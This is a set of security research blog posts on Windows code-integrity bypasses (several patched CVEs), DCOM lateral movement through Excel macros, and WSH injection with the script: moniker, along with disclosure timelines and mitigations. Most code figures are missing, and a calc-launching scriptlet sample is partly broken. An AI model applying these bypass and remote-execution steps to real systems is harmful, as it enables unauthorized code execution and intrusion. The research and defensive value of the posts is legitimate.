If we rename “utils_SetupEnv.ps1” to “utils_SetupEnv.psm1” and try to import it, it will appear to import successfully. You will notice that the “import-cs” function we used earlier isn’t recognized. This is because “import-cs” is not exposed via Export-ModuleMember.

If we look at a valid PowerShell module file, the Export-ModuleMember definition will look something like this:

What that essentially means is that only “Export-ODataEndpointProxy” can be used when the module is imported. This severely limits the abuse potential for Microsoft-signed PowerShell scripts that contain functions that can be abused to run unsigned code as most of them won’t be exposed. Again, the PowerShell team is slowly but surely mitigating many of the bypass primitives we use to circumvent Constrained Language Mode.

After investigating that fix, I discovered and reported a way around the Export-ModuleMember addition, which was assigned CVE-2017-8715 and fixed in the October Patch Tuesday release. This bypass abuses a PowerShell Module Manifest (.PSD1). When investigating the implications of these files, I realized that you could configure module behavior via these files, and that they weren’t subject to the same signing requirements that many of the other PowerShell files are (likely since PSD1 files don’t contain executable code). Despite that, PSD1s can still be signed.

If we go back to the “utils_SetupEnv.ps1” script, the “import-cs” function is no longer available since no functions from that script are exposed via Export-ModuleMember. To get around this, we can rename “utils_SetupEnv.ps1” to “utils_SetupEnv.psm1” so we can import it. After doing so, we can drop a corresponding module manifest for “utils_SetupEnv.psm1” that exports the beloved “import-cs” function for us. This module manifest will look something like this:

As you can see, we have set “import-cs” as a function to export via “FunctionsToExport”. This will export the function just as Export-ModuleMember would have. Since PowerShell module manifest files were not constrained to the same code signing requirements as other PowerShell files, we can simply create our own for the actual Microsoft signed script we want to abuse. After dropping the above manifest for the “utils_SetupEnv” PowerShell module, we can now use the “import-cs” function to execute arbitrary C# code, despite the newly introduced .PS1 import and Export-ModuleMember mitigation.

As I mentioned above, this bypass was issued CVE-2017-8715. The fix involved subjecting PowerShell module manifest files (.PSD1s) to the same code signing requirements as all the other files in a module in that if a module is signed and permitted by Device Guard or AppLocker policy, then a module manifest will only be honored if it is also signed pursuant to a whitelist rule. Doing so will prevent an attacker from modifying an existing manifest or using their own.

As always, report any UMCI bypasses to MSRC for CVEs 🙂

-Matt N.

UMCI Bypass Using PSWorkFlowUtility: CVE-2017-0215

When looking for User Mode Code Integrity (UMCI) bypasses in the context of Device Guard, my typical approach has been to hunt for Microsoft-signed PowerShell scripts/modules that contain some sort of functionality that allows for unsigned code execution. Fortunately, there are plenty that exist on Windows 10 by default. One such bypass was CVE-2017-0215, which abused the “PSWorkFlowUtility” PowerShell module to execute arbitrary unsigned PowerShell code.

You might ask, how? Looking at this module, you will notice that it has an embedded Authenticode signature block, which makes it portable (an attacker can bring the old, vulnerable version to their target as the certificate and file hash is included in the file). What else stands out to you?

We know that in the context of UMCI, the most locked down scenario is only allowing Microsoft signed code to run. Since this module is signed by Microsoft, it will be permitted to execute in Full Language Mode (as opposed to Constrained Language Mode). This particular module simply takes PowerShell code via a parameter (as a string) and continues to call “Invoke-Expression” on it, which simply executes it.

As you can see, taking the square root of Pi is blocked in Constrained Language Mode as method invocation on most .NET types are not permitted. If we import the PSWorkFlowUtility module and pass that code via the “-Expression” parameter, it will execute in Full Language Mode, giving us the result. To mitigate this, Microsoft fixed the built-in module by removing the authenticode signature and adding “[System.Security.SecurityCritical()]”, which makes the module security transparent and subject to Constrained Language Mode (CVE-2017-0215).

Since the old, vulnerable module file was Authenticode signed (making it portable), it is required to block the old, vulnerable version of this module. This can be done via the file’s hash, but it is essential that all previous, vulnerable versions of the file be accounted for – a responsibility that should honestly lie on Microsoft since they are able to collect the hashes across all Windows builds where the vulnerable module is present.

Another viable mitigation for blocking the old, vulnerable version is to note that the embedded signature is not Windows-signed (i.e. has the Windows System Component Verification EKU – 1.3.6.1.4.1.311.10.3.6). Device Guard CI policies permit limiting a publisher rule by a specific enhanced key usage (EKU). A stricter policy would allow only Windows-signed code to run – a rule that’s present in Matt Graeber’s Device Guard base reference policy. If only Windows-signed code is permitted to execute, the vulnerable version of Invoke-AsWorkflow would be limited to execution within constrained language mode, effectively mitigating the previous vulnerability. Now, vulnerable code can and will be Windows-signed but in this case, this vulnerability is effectively mitigated with a stronger Device Guard CI policy.

 

The old, vulnerable version of the module can be found here: https://gist.github.com/enigma0x3/dca6f24b2b94e120daae37505d209ecc

 

-Matt N.

Lateral Movement using Excel.Application and DCOM

Back in January, I put out two blog posts on using DCOM for lateral movement; one using MMC20.Application and the other outlining two other DCOM applications that expose “ShellExecute” methods. While most techniques have one execution method (WMI has the Create() method, psexec creates a service with a custom binpath, etc.), DCOM allows you to use different objects that expose various methods. This allows an operator to pick and choose what they look like when they land on the remote host from a parent-child process relationship perspective.

In this post, I’m going to walk through abusing the Excel.Application DCOM application to execute arbitrary code on a remote host. This same DCOM application was recently talked about for lateral movement by using the RegisterXLL method, which you can read about here. In this post, I’m going to focus on the “Run()” method. In short, this method allows you to execute a named macro in a specified Excel document. You can probably see where I’m going with this 🙂

As you all may know, VBA macros have long been a favorite technique for attackers. Normally, VBA abuse involves a phishing email with an Office document containing a macro, along with enticing text to trick the user into enabling that malicious macro. The difference here is that we are using macros for pivoting and not initial access. Due to this, Office Macro security settings are not something we need to worry about. Our malicious macro will execute regardless.

At this point, we know that Excel.Application is exposed via DCOM. By using OLEViewDotNet by James Forshaw (@tiraniddo), we can see that there are no explicit launch or access permissions set:

If a DCOM application has no explicit Launch or Access permissions, Windows allows users of the Local Administrator group to Launch and Access the application remotely. This is because DCOM applications have a “Default” set of Launch and Access permissions. If no explicit permissions are assigned, the Default set is used. This can be found in dcomcnfg.exe and will look like this:

Since Local Administrators are able to remotely interface with Excel.Application, we can then remotely instantiate it via PowerShell using [Activator]::CreateInstance():

As you can see, remote instantiation succeeded. We now have the ability to interact with Excel remotely. Next, we need to move our payload over to the remote host. This will be an Excel document that contains our malicious macro. Since VBA allows Win32 API access, the possibilities are endless for various shellcode runners. For this example, we will just use shellcode that starts calc.exe. If you are curious, you can find an example here.

Just create a new macro, name it whatever you want, add in your code and then save it. In this instance, my macro name is “MyMacro” and I am saving the file in the .xls format.

With the actual payload created, the next step is to copy that file over to the target host. Since we are using this technique for Lateral Movement, we need Local Admin rights on the target host. Since we have that, we can just copy the file over:

With the payload on target, we just need to execute it. This can be done using the Run() method of the Excel.Application DCOM application that was instantiated earlier. Before we can actually call that method, the application needs to know what Excel file the macro resides in. This can be accomplished using the “Workbooks.Open()” method. This method just takes the local path of the file. So, what happens if we invoke the method and pass the location of the file we just copied?

Well, isn’t that interesting. The file exists, but Excel.Application is stating that it doesn’t. Why might this be? When Excel.Application is instantiated via DCOM, it is actually instantiated via the Local System identity. The Local System user, by default, does not have a profile. Since Excel assumes that it is in an interactive user session, it fails in a less than graceful way. How can we fix this? There are better ways to do this, but a quick solution is to remotely create the Local System profile.

The path for this profile will be: C:\Windows\System32\config\systemprofile\Desktop and C:\Windows\SysWOW64\config\systemprofile\Desktop.

Now that the Local System profile is created, we need to re-instantiate the Excel.Application object and then call “Workbooks.Open()” again:

As you can see, we were now able to open the workbook containing our malicious macro. At this point, all we need to do is call the “Run()” method and pass it the name of our malicious macro. If you remember from above, I named mine “MyMacro”

Calling “Run(myMacro)” will cause the VBA in that macro to execute. To verify this, we can open Process Explorer on the remote host and verify. As you can see below, this particular host has the “Disable VBA for Office Applications” GPO set. Regardless of that security setting, the macro is permitted to execute:

For this example, I just used calc spawning shellcode, which resulted in a child process being spawned under Excel.exe. Keep in mind that since VBA offers a lot in terms of interaction with the OS, it is possible to not spawn a child process and just inject into another process instead. The final steps would be to remotely cleanup the Excel object and delete the payload off the target host.

I have automated this technique via PowerShell, which you can find here: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b

To assist in mitigating this vector, you could manually apply remote Launch and Access permissions to the Excel.Application object…but don’t forget to look at all the other Office applications. Another option would be to change the default remote Launch/Access DACLs via dcomcnfg.exe. Keep in mind that any DACL changes should be tested as such modifications could potentially impact legitimate usage.  In addition to that, enabling the Windows Firewall and reducing the number of Local Administrators on a host are also valid mitigation steps.

What stands out the most with this technique is that Excel and the child process will spawn as the invoking user. This will often be process creations from user accounts that different than the user that is currently logged on. If those are the only two processes and the user account being used doesn’t normally logon to that host, that might be a red flag.

-Matt N.

UMCI vs Internet Explorer: Exploring CVE-2017-8625

In the recent months, I have spent some time digging into Device Guard and how User Mode Code Integrity (UMCI) is implemented. If you aren’t familiar with Device Guard, you can read more about it here. Normally, UMCI prevents unapproved binaries from executing, restricts the Windows Scripting Host, and places PowerShell in Constrained Language mode. This makes obtaining code execution on a system fairly challenging. This post is going to highlight bypassing User Mode Code Integrity to instantiate objects that are normally blocked.

This bug was fixed in the August 2017 Patch Tuesday release under CVE-2017-8625. The patch fixed two different techniques as both of them abuse the fact that MSHTML isn’t enlightened. The other technique abused Microsoft Compiled HTML Help files (CHMs). This was blogged about by @Oddvarmoe and you can read more about that here: https://msitpros.com/?p=3909

As I mentioned above, the root cause of the bug was that MSHTML wasn’t enlightened in the context of UMCI. This essentially means that Device Guard’s UMCI component didn’t restrict MSHTML and simply let it execute everything with assumed “Full Trust.” Due to this, Internet Explorer permitted loading restricted objects. How, you might ask? The answer lies with Internet Explorer’s ability to interface with ActiveX and COM components =)

For example, the below HTML file will use a script tag to run some JScript. UMCI normally blocks instantiation of this object (and just about every other one). As a PoC, I just instantiated WScript.Shell and invoked the “Run” method to demonstrate I could instantiate a blocked object and invoke one of its methods.

As you can see below, “WScript.Shell” was blocked from instantiating via UMCI. Immediately following that, we instantiate “WScript.Shell” again via the HTML file and then start “calc.exe” via the “Run” method:

Since MSHTML didn’t conform to the same restrictions as other OS components, the WScript.Shell object was permitted to load and the run method was freely accessible.

It should be noted that Internet Explorer does apply zone security to prevent automatic execution of ActiveX controls via HTML. When opened, the user will see two prompts, one from IE asking permission to enable the ActiveX content and another security warning alerting the user that the content might be malicious. If an attacker is on a system but doesn’t have unsigned code execution (see WMImplant), all it takes is two User Hive registry changes to temporarily disable the ActiveX alerting, allowing for silent unsigned code-execution. Those two changes look like this:

Most UMCI bypasses are serviceable bugs per Microsoft, so be sure to send those over to secure@microsoft.com if you like CVEs =)

With CVE-2017-8625 issued, ActiveX/COM controls are no longer able to be loaded as Internet Explorer is now enlightened. This hopefully makes MSHTML bypasses a bit harder to find =)

Disclosure timeline:

12/13/2016: Report submitted to secure@microsoft.com
03/2017: Fix was pushed into RS1 (Creators Update)
08/08/2017: RS1 fix was back ported; CVE-2017-8625 issued

-Matt N.

WSH Injection: A Case Study

At BSides Nashville 2017, Casey Smith (@SubTee) and I gave a talk titled Windows Operating System Archaeology. At this talk, we released a handful of offensive techniques that utilized the Component Object Model (COM) in Windows. One such technique described was abusing attacker controlled input passed to calls to GetObject(), which I will be discussing here.

Some environments use whitelisting to prevent unsigned Windows Scripting Host (WSH) files from running, especially with the rise of malicious .js or .vbs files. However, by “injecting” our malicious code into a Microsoft signed WSH script, we can bypass such a restriction.

Before diving into the different scripts that can be used for injection, it’s important to understand some of the mechanics behind why this works. When abusing injection, we are taking advantage of attacker controlled input passed to GetObject() and then combining that with the “script:” or “scriptlet:” COM monikers.

GetObject()

This method allows you to access an already instantiated COM object. If there isn’t an instance of the object already (if invoked without a moniker), this call will fail. For example, accessing Microsoft Excel’s COM object via GetObject() would look like this:

Set obj = GetObject( , "Excel.Application")

For the above to work, an instance of Excel has to be running. You can read more about GetObject() here

COM Monikers

While GetObject() is interesting by itself, it only allows us to access an instance of an already instantiated COM object. To get around this, we can implement a COM moniker to facilitate our payload execution. If you aren’t familiar with COM monikers, you can read more about them here. There are various COM monikers on Windows that allow you to instantiate objects in various ways. From an offensive standpoint, you can use these monikers to execute malicious code. That is a topic for another blog post :-).

For this post, we will focus on the “script:” and “scriptlet:” monikers. These particular monikers interface with scrobj.dll and help facilitate execution of COM scriptlets, which will be the payload. This was discovered by Casey Smith (@SubTee) and discussed at DerbyCon 2016 as well as blogged about here.

An example COM scriptlet will look like this:

<?XML version="1.0"?>
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</scriptlet>

You can also use James Forshaw’s (@tiraniddo) tool DotNetToJScript to extend the JScript/VBScript in the COM Scriptlet, allowing for Win32 API access and even Shellcode execution. When you combine one of these two monikers and various calls to GetObject(), a lot of fun is had.

Now that the very brief COM background is over, time to look at an example 🙂

PubPrn.vbs

On Windows 7+, there is a Microsoft Signed WSH script called “PubPrn.vbs,” which resides in “C:\Windows\System32\Printing_Admin_Scripts\en-US”. When looking at this particular script, it becomes apparent that it is taking input provided by the user (via command line arguments) and passing an argument to “GetObject()”.

This means that we can run this script and pass it the two arguments it expects. The first argument can be anything and the second argument is the payload via the script: moniker.

Note: If you provide a value that isn’t a network address for the first argument (since it expects a ServerName), you can add the “/b” switch to cscript.exe when calling to suppress any additional error messages.

Since VBScript relies on COM to perform actions, it is used heavily in numerous Microsoft signed scripts. While this is just one example, there are bound to be others that can be exploited in a similar fashion. I encourage you to go hunting 🙂

  • Matt N.